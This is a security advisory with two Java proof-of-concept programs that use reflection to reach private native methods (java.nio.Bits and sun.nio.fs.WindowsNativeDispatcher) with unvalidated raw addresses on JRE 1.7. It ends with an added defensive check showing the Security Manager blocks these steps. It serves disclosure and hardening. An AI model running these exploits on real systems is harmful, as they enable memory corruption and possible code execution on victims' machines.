Java Crash Mishandling Execute Arbitrary (Native, Non-Java) Code Vulnerability

Summary

Java suffers from a crash-mishandling vulnerability that allows execution of arbitrary (native, non-Java) code.

Credit:

Details

Vulnerable Systems:
 * Java JRE version 1.7.0_17
 * Java JRE version 1.7.0_09
 * Java JRE version 1.7.0_03

The following two exploits cause Java to crash; the crash occurs because data passed through reflection to native functions is mishandled. The crash can be controlled and used to modify arbitrary memory contents, which can then be used to make Java execute arbitrary (native, non-Java) code.

Exploit 1:
import java.lang.reflect.*;

class exploit {

    public static void main(String[] args) throws Exception {
        // Thread.sleep(15*1000);
        System.out.println("\n[JFUZZER] Invoking tests for exploit");
        // java.nio.Bits is package-private with a private constructor; reflection bypasses both
        Class packageClass = Class.forName("java.nio.Bits");
        Constructor[] c = packageClass.getDeclaredConstructors();
        Constructor ctor = c[0];
        ctor.setAccessible(true);
        Object target = ctor.newInstance();
        System.out.println("[JFUZZER] Fuzzing methods...");

        try {
            // signature: copyFromIntArray(Object src, long srcPos, long dstAddr, long length)
            Class[] arguments = new Class[4];
            arguments[0] = Object.class;
            arguments[1] = long.class;
            arguments[2] = long.class;
            arguments[3] = long.class;

            Method m = packageClass.getDeclaredMethod("copyFromIntArray", arguments);
            m.setAccessible(true);

            byte[] data = {(byte)0xab, (byte)0xab, (byte)0xab, (byte)0xab, (byte)0xab, (byte)0xab, (byte)0xab, (byte)0xab, (byte)0xab, (byte)0xab, (byte)0xab, (byte)0xab, (byte)0xab, (byte)0xab, (byte)0xab};

            try {
                // dstAddr (0x00400000) is passed to the native copy as a raw address; nothing validates it
                Object[] params = {(Object)data, (long)0x00000000, (long)0x00400000, (long)0x0000000c};
                m.invoke(target, params);
            }
            catch (Exception e) {
            }

        }
        catch (Exception e) {
        }

        System.out.println("[JFUZZER] Fuzzing finished!");
    }
}

Exploit 2:
import java.lang.reflect.*;

class exploit {

    public static void main(String[] args) throws Exception {
        // Thread.sleep(15*1000);
        System.out.println("\n[JFUZZER] Invoking tests for sun_nio_fs_WindowsNativeDispatcher_InitializeSecurityDescriptor_param0_e3e0b8e7ab4663b5a007822e83cd9653");
        // Windows-only internal class; its constructor is private and is reached via reflection
        Class packageClass = Class.forName("sun.nio.fs.WindowsNativeDispatcher");
        Constructor[] c = packageClass.getDeclaredConstructors();
        Constructor ctor = c[0];
        ctor.setAccessible(true);
        Object target = ctor.newInstance();
        System.out.println("[JFUZZER] Fuzzing methods...");
        // the native method treats this long as a raw pointer; no validation is performed
        Long param1 = (long)0xdeadbeef;

        try {
            // signature: InitializeSecurityDescriptor(long address)
            Class[] arguments = new Class[1];
            arguments[0] = long.class;

            Method m = packageClass.getDeclaredMethod("InitializeSecurityDescriptor", arguments);
            m.setAccessible(true);

            try {
                Object[] params = {param1};
                m.invoke(target, params);
            }
            catch (Exception e) {
            }

        }
        catch (Exception e) {
        }

        System.out.println("[JFUZZER] Fuzzing finished!");
    }
}

Acknowledgement:
The vulnerabilities have been identified by FuzzMyApp and disclosed to the vendor through Beyond Security's SecuriTeam Secure Disclosure program.

Vendor Status:
Oracle has assessed these reported issues as not vulnerabilities as the described scenarios required the Security Manager to be turned off.
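The vendor's position rests on the Security Manager. The following check, added here and not part of the advisory or of the FuzzMyApp exploits, shows where the default Security Manager policy stops each reflective step that the two exploits rely on, before any native method can be invoked. It assumes Java 8 (lambdas, and java.lang.SecurityManager still available) under the default java.policy, which grants application code neither accessDeclaredMembers, suppressAccessChecks nor access to sun.* packages.

```java
import java.lang.reflect.Method;

public class ReflectionGuardCheck {

    interface Step { void run() throws Exception; }

    // Runs one reflective step and reports whether the Security Manager refused it.
    static boolean blocked(String label, Step step) {
        try {
            step.run();
            System.out.println("ALLOWED: " + label);
            return false;
        } catch (SecurityException e) {
            System.out.println("BLOCKED: " + label + " -> " + e.getMessage());
            return true;
        } catch (Exception e) {
            // Not a policy decision (e.g. the class is absent on this platform).
            System.out.println("N/A:     " + label + " -> " + e);
            return false;
        }
    }

    public static void main(String[] args) throws Exception {
        if (System.getSecurityManager() == null) {
            // Equivalent to launching with -Djava.security.manager (default policy).
            System.setSecurityManager(new SecurityManager());
        }

        // Exploit 1 path. Loading java.nio.Bits itself is permitted (java.* is not a
        // restricted package), but enumerating its non-public members requires
        // RuntimePermission("accessDeclaredMembers"), which the default policy withholds.
        Class<?> bits = Class.forName("java.nio.Bits");
        blocked("Bits.getDeclaredConstructors()", () -> bits.getDeclaredConstructors());
        blocked("Bits.getDeclaredMethod(copyFromIntArray)", () -> {
            Method m = bits.getDeclaredMethod("copyFromIntArray",
                    Object.class, long.class, long.class, long.class);
            m.setAccessible(true);  // would additionally need ReflectPermission("suppressAccessChecks")
        });

        // Exploit 2 path. Even resolving the class name is refused: sun.* is listed in
        // package.access, so the class loader demands
        // RuntimePermission("accessClassInPackage.sun.nio.fs").
        blocked("Class.forName(sun.nio.fs.WindowsNativeDispatcher)",
                () -> Class.forName("sun.nio.fs.WindowsNativeDispatcher"));
    }
}
```

Run it once with the Security Manager installed (as above) and once with the setSecurityManager call removed to see the same steps succeed, which is the configuration the advisory's exploits depend on.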
